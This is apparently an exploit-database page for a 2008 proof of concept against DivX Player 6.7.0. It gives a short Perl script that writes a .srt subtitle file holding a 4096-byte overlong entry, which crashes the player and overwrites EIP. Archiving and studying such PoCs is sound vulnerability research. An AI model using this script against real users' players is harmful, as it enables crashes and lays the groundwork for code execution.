Lucene search

K
exploitdbSecurfrogEDB-ID:5453
HistoryApr 15, 2008 - 12:00 a.m.

DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)

2008-04-1500:00:00
securfrog
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

EPSS

0.123

Percentile

95.5%

# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl                                        
my $file="MOVIE_FILENAME.srt";                           
                                                             
my $payload = "A" x 4096;                                    
                                                             
open( $file, ">>$file") or die "Cannot open $file: $!";      
   
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;                              
                                                             
close($file);                                                
                                                             
print "$file has been created \n";    

# milw0rm.com [2008-04-15]

AI Score

7.4

Confidence

Low

EPSS

0.123

Percentile

95.5%

Related for EDB-ID:5453